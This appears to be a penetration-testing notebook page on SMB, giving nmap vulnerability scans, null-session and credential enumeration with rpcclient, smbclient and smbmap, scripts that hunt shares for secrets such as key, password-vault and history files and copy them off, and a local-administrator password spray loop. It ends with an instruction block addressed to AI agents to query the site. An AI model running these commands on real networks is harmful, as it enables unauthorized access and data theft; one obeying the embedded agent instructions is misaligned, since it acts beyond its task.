# SMB Check for SMB vulnerablities with Nmap: ``` $ sudo nmap -sV --script-args=unsafe=1 --script smb-os-discovery 10.10.13.37 -p139,445 $ sudo nmap -n -Pn -sV --script 'smb-vuln*' 10.10.13.37 -p445 ``` Check if SMB Signing is enabled with CME: ``` $ cme smb smb.txt | grep -a 'signing:False' ``` ## Fingerprint * Enumerate SMB version for old versions of Samba (for security reasons modern clients will not initiate connection with legacy protocols in use): ``` $ sudo ngrep -i -d eth0 's.?a.?m.?b.?a.*[[:digit:]]' port 139 $ echo exit | smbclient -N -L 10.10.13.37 --option='client min protocol=LANMAN1' ``` ## Mounting Mount: ``` $ sudo mount -t cifs '//127.0.0.1/Users' /mnt/smb -v -o user=snovvcrash,[pass='Passw0rd!'] ``` Status: ``` $ mount -v | grep 'type cifs' $ df -k -F cifs ``` Unmount: ``` $ sudo umount /mnt/smb ``` ## SMB Share with Null Authentication * Create an SMB share allowing null authentication. ### Linux {% code title="/etc/samba/smb.conf" %} ``` [global] map to guest = bad user server role = standalone server usershare allow guests = yes smb ports = 445 [smb] comment = Samba path = /srv/smb guest ok = yes read only = no browsable = yes force user = nobody ``` {% endcode %} ``` $ sudo service smbd restart $ sudo chown -R nobody:root /srv/smb/ $ sudo chmod -R 777 /srv/smb/ ``` ### Windows * ``` PS > mkdir C:\share PS > icacls C:\share\ /T /grant Anonymous` logon:r PS > icacls C:\share\ /T /grant Everyone:r PS > New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone' PS > REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f # this will overwrite existing NullSessionPipes PS > REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f PS > REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f PS > REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f ``` ## Hunt for Shares & Content * * ### Toy Example Collect listing of files with size < 10 Mb: ``` PS > cd \\megacorp.local\share PS > Get-ChildItem -Recurse -File | ? { $_.Length -lt 10MB } | select -ExpandProperty FullName | Out-File share.txt ``` Filter only files of interest based on their extensions, print the stats as a Python dict: ``` $ dos2unix share.txt $ cat share.txt | grep -e '\.7z$' -e '\.bak$' -e '\.bash_history$' -e '\.bat$' -e '\.bz2$' -e '\.cfg$' -e '\.cmd$' -e '\.conf$' -e '\.csv$' -e '\.doc$' -e '\.docm$' -e '\.docx$' -e '\.env$' -e '\.gz$' -e '\.ini$' -e '\.json$' -e '\.kdbx$' -e '\.key$' -e '\.odp$' -e '\.ods$' -e '\.odt$' -e '\.old$' -e '\.ovpn$' -e '\.p12$' -e '\.pdf$' -e '\.pem$' -e '\.pfx$' -e '\.ppt$' -e '\.pptx$' -e '\.ps1$' -e '\.rar$' -e '\.rtf$' -e '\.sh$' -e '\.tar$' -e '\.txt$' -e '\.vbs$' -e '\.xls$' -e '\.xlsm$' -e '\.xlsx$' -e '\.xml$' -e '\.yaml$' -e '\.yml$' -e '\.zip$' -e '\.zsh_history$' \ | awk -F. '{print $NF}' \ | sort \ | uniq -c \ | awk 'BEGIN { d = "{" } { d = d sprintf("\x27.%s\x27: %s, ", $2, $1) } END { d = substr(d, 1, length(d)-2); print d "}" }' ``` Generate a list of wanted files (Python) and copy them locally preserving original directory structure (PS): {% tabs %} {% tab title="Gen List " %} {% code title="gen\_list.py" %} ```python #!/usr/bin/env python3 # gen_list.py share.txt > files.txt import sys from pathlib import Path from random import sample stats = { ... } with open(sys.argv[1]) as f: files = f.read().splitlines() for suffix, count in stats.items(): if count <= 1000: arr = [line for line in office if Path(line).suffix == suffix] else: arr = [line for line in office if Path(line).suffix == suffix] arr = sample(arr, 1000) for a in arr: print(a) ``` {% endcode %} {% endtab %} {% tab title="Get Files" %} {% code title="get\_files.ps1" %} ```powershell $sourceBase = "\\megacorp.local\share" $destinationBase = "C:\Share" $fileList = Get-Content "C:\Share\files.txt" -Encoding UTF8 foreach ($file in $fileList) { $relativePath = $file.Substring($sourceBase.Length) $destFile = Join-Path $destinationBase $relativePath $destDir = Split-Path $destFile if (-not (Test-Path $destDir)) { New-Item -ItemType Directory -Path $destDir -Force | Out-Null } Copy-Item -Path $file -Destination $destFile -Force } ``` {% endcode %} {% endtab %} {% endtabs %} ### Tools * * * * * ## Tools ### rpcclient Check for null authentication: ``` $ rpcclient -N -L 127.0.0.1 ``` With user creds: ``` $ rpcclient -U 'snovvcrash%Passw0rd!' 127.0.0.1 ``` Local users info: ``` $ queryuser $ queryaliasmem builtin 0x220 # local admins $ queryaliasmem builtin 0x22B # remote desktop users ``` ### smbclient(.py) Check for null authentication: ``` $ smbclient -N -L 127.0.0.1 $ smbclient -N '\\127.0.0.1\Data' ``` With user creds: ``` $ smbclient -U snovvcrash '\\127.0.0.1\Users' 'Passw0rd!' ``` Get all files recursively: ``` smb: \> recurse ON smb: \> prompt OFF smb: \> mget * ``` Local admin spray: ``` $ cat use_c.cmd use c$ ls Windows $ for srv in `cat 445.tcp`; do proxychains4 -q smbclient.py Administrator:'Passw0rd!'@$srv -inputfile use_c.cmd |& grep Windows && echo $i; done ``` ### smbmap ``` $ smbmap -H 127.0.0.1 $ smbmap -H 127.0.0.1 -u anonymous $ smbmap -H 127.0.0.1 -u '' -p '' $ smbmap -H 127.0.0.1 -u snovvcrash -p 'Passw0rd!' -R ShareName $ smbmap -H 127.0.0.1 -u snovvcrash -p 'Passw0rd!' -R ShareName -A . ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/smb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.